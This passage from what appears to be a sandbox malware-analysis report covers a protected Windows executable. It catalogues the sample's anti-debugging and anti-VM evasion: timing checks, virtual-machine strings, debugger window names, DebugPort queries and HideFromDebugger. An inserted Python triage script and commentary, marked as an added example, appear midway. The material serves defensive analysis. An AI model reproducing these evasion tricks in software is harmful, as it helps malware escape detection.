Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1368495 second address: 13684B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF8E8F833B6h 0x00000009 jbe 00007FF8E8F833B6h 0x0000000f jmp 00007FF8E8F833BEh 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1369D1E second address: 1369D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 136C083 second address: 136C097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1378E9F second address: 1378EB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FF8E8F8DBB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jo 00007FF8E8F8DBCFh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138AE85 second address: 138AEAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF8E8F833BEh 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007FF8E8F833BDh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138AEAB second address: 138AEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF8E8F8DBBFh 0x00000012 popad 0x00000013 jmp 00007FF8E8F8DBC0h 0x00000018 jl 00007FF8E8F8DBC2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138AEE0 second address: 138AEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390872 second address: 1390887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF8E8F8DBBCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390887 second address: 13908A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF8E8F833BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FF8E8F833B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13908A5 second address: 13908A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390CC1 second address: 1390CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF8E8F833C5h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390CDF second address: 1390CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390CE3 second address: 1390CEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390CEF second address: 1390D13 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FF8E8F8DBBAh 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 js 00007FF8E8F8DBBCh 0x0000001a jp 00007FF8E8F8DBB6h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1390D13 second address: 1390D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1391291 second address: 13912A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FF8E8F8DBB6h 0x0000000b ja 00007FF8E8F8DBB6h 0x00000011 pop edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1391D0D second address: 1391D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139790A second address: 1397917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007FF8E8F8DBB6h 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1399315 second address: 139931B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 139931B second address: 1399328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007FF8E8F8DBB6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B66AF second address: 13B66C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13B66C1 second address: 13B66D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF8E8F8DBBAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C6EAD second address: 13C6ECB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8E8F833C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF8E8F833B6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C61F1 second address: 13C61F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C65D5 second address: 13C65DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C65DA second address: 13C6615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF8E8F8DBB6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8E8F8DBC6h 0x00000012 jmp 00007FF8E8F8DBC8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C6615 second address: 13C6633 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jc 00007FF8E8F833B6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C6633 second address: 13C6639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C984B second address: 13C984F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9A40 second address: 13C9A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9A45 second address: 13C9A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9A4B second address: 13C9A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9AF8 second address: 13C9B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF8E8F833B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f and edx, dword ptr [ebp+122D3592h] 0x00000015 push 00000004h 0x00000017 mov dword ptr [ebp+122D254Ch], esi 0x0000001d call 00007FF8E8F833B9h 0x00000022 js 00007FF8E8F833C4h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9B27 second address: 13C9B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9B2D second address: 13C9B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F833C4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9B49 second address: 13C9B60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnp 00007FF8E8F8DBB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9B60 second address: 13C9B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9B65 second address: 13C9B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9DB9 second address: 13C9DDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF8E8F833C8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13C9DDB second address: 13C9E47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or edx, 5B57759Ah 0x00000011 mov edx, dword ptr [ebp+1247B146h] 0x00000017 push dword ptr [ebp+122D3186h] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FF8E8F8DBB8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 34B73AD2h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF8E8F8DBC2h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CCD41 second address: 13CCD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CCD45 second address: 13CCD4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 13CC8C4 second address: 13CC8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5530356 second address: 553038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF8E8F8DBBEh 0x00000012 or eax, 0F1EFB78h 0x00000018 jmp 00007FF8E8F8DBBBh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 553038B second address: 553039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 553039B second address: 55303A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 553040E second address: 5530414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5530414 second address: 553041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 553041A second address: 553041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 553041E second address: 5530443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5530443 second address: 5530447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5530447 second address: 553044D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
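Each of the interceptor lines above records two consecutive RDTSC executions and the instructions the sandbox saw in between: the protected code subtracts the two counter readings, and a large difference means the window was single-stepped, trapped or emulated slowly. The strings further down (Oreans.vxd, Software\WinLicense) identify the protector as an Oreans product, and the back-to-back windows padded with push/pop and pushad/popad pairs are the shape its timing checks take. The script below is an added triage example, not part of the Joe Sandbox report: it parses these records, separates padding from branches and real work, checks whether each window executed straight-line (the last listed offset equals the address span) or took a branch or call, and groups windows that chain address-to-address into cascades. The five sample records are copied from the listing above; the line format regex, the padding set and the "real work" notion are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox "RDTSC instruction interceptor" records.

Added example, not part of the report.  Each record is one pair of
consecutive rdtsc executions plus the instructions observed between them.
"""
import re
from dataclasses import dataclass

# Sample records, copied verbatim from the report (text after the "Source:" column).
SAMPLE_LINES = [
    "RDTSC instruction interceptor: First address: 136832C second address: 1368332 instructions: "
    "0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    "RDTSC instruction interceptor: First address: 1368332 second address: 1368336 instructions: "
    "0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    "RDTSC instruction interceptor: First address: 1368336 second address: 1368346 instructions: "
    "0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx "
    "0x00000007 pop eax 0x00000008 jl 00007FF8E8F8DBC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc",
    "RDTSC instruction interceptor: First address: 1368495 second address: 13684B6 instructions: "
    "0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF8E8F833B6h 0x00000009 jbe 00007FF8E8F833B6h "
    "0x0000000f jmp 00007FF8E8F833BEh 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx "
    "0x00000018 rdtsc",
    "RDTSC instruction interceptor: First address: 13C9DDB second address: 13C9E47 instructions: "
    "0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop "
    "0x0000000b or edx, 5B57759Ah 0x00000011 mov edx, dword ptr [ebp+1247B146h] "
    "0x00000017 push dword ptr [ebp+122D3186h] 0x0000001d push 00000000h 0x0000001f push eax "
    "0x00000020 call 00007FF8E8F8DBB8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax "
    "0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret "
    "0x00000035 pop eax 0x00000036 ret 0x00000037 push 34B73AD2h 0x0000003c push eax 0x0000003d push eax "
    "0x0000003e push edx 0x0000003f jmp 00007FF8E8F8DBC2h 0x00000044 rdtsc",
]

# Assumed record layout, derived from the lines above.
RECORD_RE = re.compile(
    r"First address: (?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+)"
    r" instructions: (?P<listing>.*)$"
)
# Every instruction is preceded by its byte offset from the first address, as 0x%08x.
OFFSET_RE = re.compile(r"\s*0x([0-9A-Fa-f]{8})\s+")
# Instructions that only shuffle the stack; the protector pads timing windows with them.
PADDING = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "nop"}


def mnemonic(text):
    return text.split()[0]


def is_branch(text):
    m = mnemonic(text)
    return m.startswith("j") or m in ("call", "ret")


@dataclass
class RdtscWindow:
    first: int      # address of the first rdtsc
    second: int     # address of the second rdtsc
    insns: list     # [(offset_from_first, instruction_text), ...]

    @property
    def span(self):
        return self.second - self.first

    @property
    def between(self):
        """Instructions executed between the first and the last rdtsc."""
        rd = [i for i, (_, t) in enumerate(self.insns) if t == "rdtsc"]
        return self.insns[rd[0] + 1:rd[-1]] if len(rd) >= 2 else []

    @property
    def branches(self):
        return [t for _, t in self.between if is_branch(t)]

    @property
    def real_work(self):
        """Anything in the window that is neither padding nor a branch."""
        return [t for _, t in self.between
                if not is_branch(t) and mnemonic(t) not in PADDING]

    @property
    def linear(self):
        """True when the last listed offset equals the address span, i.e. the
        window ran straight-line.  False means a branch or call was taken
        inside it, so the listing is an execution trace, not a disassembly."""
        return self.insns[-1][0] == self.span


def parse_line(line):
    """Parse one interceptor line; returns None for lines of another kind."""
    m = RECORD_RE.search(line)
    if not m:
        return None
    parts = OFFSET_RE.split(m.group("listing"))   # ['', off, insn, off, insn, ...]
    insns = [(int(parts[i], 16), parts[i + 1].strip())
             for i in range(1, len(parts) - 1, 2)]
    return RdtscWindow(int(m.group("first"), 16), int(m.group("second"), 16), insns)


def cascades(windows):
    """Group windows whose second address is the next window's first address:
    a long group means the counter is re-read back to back."""
    groups = []
    for w in windows:
        if groups and groups[-1][-1].second == w.first:
            groups[-1].append(w)
        else:
            groups.append([w])
    return groups


def report(lines):
    """One summary dict per parsable line."""
    return [{"first": f"{w.first:X}", "span": w.span, "between": len(w.between),
             "branches": len(w.branches), "real_work": w.real_work, "linear": w.linear}
            for w in filter(None, map(parse_line, lines))]


if __name__ == "__main__":
    for r in report(SAMPLE_LINES):
        print(r)
    ws = [parse_line(l) for l in SAMPLE_LINES]
    print("cascade lengths:", [len(c) for c in cascades(ws)])
```

On the five samples the first three windows chain into one cascade and contain nothing but padding, the fourth took a jmp inside the window (24 listed bytes versus a 33-byte address span), and the last does real work between the reads, including a call/ret pair and arithmetic on the return address, which is the pattern to look at when deciding where the actual timing comparison lives.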
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1141902 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11419D0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12F34BB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (display adapter class; the value names the GPU driver, which reveals a hypervisor's virtual adapter)
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EF38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EF4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EEDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EEE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EF4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EEED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EE16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EF3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EEF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00EEBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EEDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE1160 GetSystemInfo,ExitProcess,0_2_00EE1160
Source: file.exe, file.exe, 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1627926455.00000000016E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1627926455.00000000016B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: file.exe, 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1627926455.000000000166E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwarei
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13611
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13608
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13628
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13623
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13663
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EE45C0 VirtualProtect ?,00000004,00000100,000000000_2_00EE45C0
